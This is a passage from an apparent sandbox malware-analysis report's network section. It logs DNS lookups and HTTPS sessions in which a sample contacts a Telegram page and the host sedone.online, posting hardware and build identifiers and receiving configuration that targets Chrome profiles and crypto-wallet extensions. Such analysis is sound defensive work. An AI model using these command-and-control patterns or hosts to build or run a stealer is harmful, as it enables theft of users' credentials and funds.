                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.000308037 CET192.168.2.71.1.1.10x62Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.772066116 CET192.168.2.71.1.1.10x6338Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.772612095 CET192.168.2.71.1.1.10xc846Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.019522905 CET192.168.2.71.1.1.10xd9e1Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.022743940 CET192.168.2.71.1.1.10x1336Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.023587942 CET192.168.2.71.1.1.10x7b4dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.023967981 CET192.168.2.71.1.1.10x2ac2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.043452024 CET192.168.2.71.1.1.10x1365Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.043724060 CET192.168.2.71.1.1.10x8b00Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530571938 CET192.168.2.71.1.1.10xef41Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.530932903 CET192.168.2.71.1.1.10x96deStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.531908035 CET192.168.2.71.1.1.10x1b73Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.532025099 CET192.168.2.71.1.1.10x8d0eStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043870926 CET192.168.2.71.1.1.10xda68Standard query (0)deff.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044020891 CET192.168.2.71.1.1.10xd50cStandard query (0)deff.nelreports.net65IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.965791941 CET1.1.1.1192.168.2.70xe9d3No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.467752934 CET1.1.1.1192.168.2.70xbfd0No error (0)sedone.online116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.911634922 CET1.1.1.1192.168.2.70xd87dNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.916599989 CET1.1.1.1192.168.2.70xb08fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.468054056 CET1.1.1.1192.168.2.70xc692No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.469289064 CET1.1.1.1192.168.2.70xb77bNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:03.196655989 CET1.1.1.1192.168.2.70x40d7No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:03.216398954 CET1.1.1.1192.168.2.70x7d96No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:03.216398954 CET1.1.1.1192.168.2.70x7d96No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.138032913 CET1.1.1.1192.168.2.70x62No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.138660908 CET1.1.1.1192.168.2.70x3e4dNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.910219908 CET1.1.1.1192.168.2.70x6338No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:05.910219908 CET1.1.1.1192.168.2.70x6338No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:06.018834114 CET1.1.1.1192.168.2.70xc846No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.157438040 CET1.1.1.1192.168.2.70xd9e1No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.157438040 CET1.1.1.1192.168.2.70xd9e1No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.159883022 CET1.1.1.1192.168.2.70x1336No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.161148071 CET1.1.1.1192.168.2.70x2ac2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.161192894 CET1.1.1.1192.168.2.70x7b4dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.161192894 CET1.1.1.1192.168.2.70x7b4dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.180618048 CET1.1.1.1192.168.2.70x1365No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.180618048 CET1.1.1.1192.168.2.70x1365No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:07.180651903 CET1.1.1.1192.168.2.70x8b00No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.246237993 CET1.1.1.1192.168.2.70x1148No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.246237993 CET1.1.1.1192.168.2.70x1148No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668528080 CET1.1.1.1192.168.2.70xef41No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668528080 CET1.1.1.1192.168.2.70xef41No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668528080 CET1.1.1.1192.168.2.70xef41No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668528080 CET1.1.1.1192.168.2.70xef41No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.668975115 CET1.1.1.1192.168.2.70x1b73No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:10.669203997 CET1.1.1.1192.168.2.70x8d0eNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.182185888 CET1.1.1.1192.168.2.70xd50cNo error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283886909 CET1.1.1.1192.168.2.70xda68No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • t.me
                                                                                                                                                                                                                                                • sedone.online
                                                                                                                                                                                                                                                • www.google.com
                                                                                                                                                                                                                                                • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                • clients2.googleusercontent.com
                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                  • assets.msn.com
                                                                                                                                                                                                                                                  • c.msn.com
                                                                                                                                                                                                                                                  • sb.scorecardresearch.com
                                                                                                                                                                                                                                                  • browser.events.data.msn.com

                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.749700149.154.167.994432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:30 UTC86OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:31 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 12323
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: stel_ssid=672f5051597466d0c6_3497927683748389837; expires=Tue, 17 Dec 2024 14:39:30 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                2024-12-16 14:39:31 UTC12323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.749701116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:33 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.749703116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MOPHDT0HDJMYUAIWTJE3
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:35 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 4f 50 48 44 54 30 48 44 4a 4d 59 55 41 49 57 54 4a 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 35 31 43 43 36 44 42 41 35 45 31 35 37 33 35 33 32 31 30 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 48 44 54 30 48 44 4a 4d 59 55 41 49 57 54 4a 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 50 48 44 54 30 48 44 4a 4d 59 55 41 49 57 54 4a 45 33 2d 2d 0d
                                                                                                                                                                                                                                                Data Ascii: ------MOPHDT0HDJMYUAIWTJE3Content-Disposition: form-data; name="hwid"7451CC6DBA5E1573532102-a33c7340-61ca------MOPHDT0HDJMYUAIWTJE3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MOPHDT0HDJMYUAIWTJE3--
                                                                                                                                                                                                                                                2024-12-16 14:39:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:36 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|2afa0bd343ad19f9200a181fa83489aa|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.749704116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:37 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AI58QQIWLXBIM7Y5P8Q9
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:37 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 41 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------AI58QQIWLXBIM7Y5P8Q9Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------AI58QQIWLXBIM7Y5P8Q9Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AI58QQIWLXBIM7Y5P8Q9Cont
                                                                                                                                                                                                                                                2024-12-16 14:39:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:38 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.749711116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:40 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----U3WL6P8YMYM7QI589R9Z
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 52 39 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------U3WL6P8YMYM7QI589R9ZContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------U3WL6P8YMYM7QI589R9ZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3WL6P8YMYM7QI589R9ZCont
                                                                                                                                                                                                                                                2024-12-16 14:39:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:41 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.749720116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:42 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9000ZCJ5XBIEU37YU3WT
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:42 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------9000ZCJ5XBIEU37YU3WTContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------9000ZCJ5XBIEU37YU3WTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9000ZCJ5XBIEU37YU3WTCont
                                                                                                                                                                                                                                                2024-12-16 14:39:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
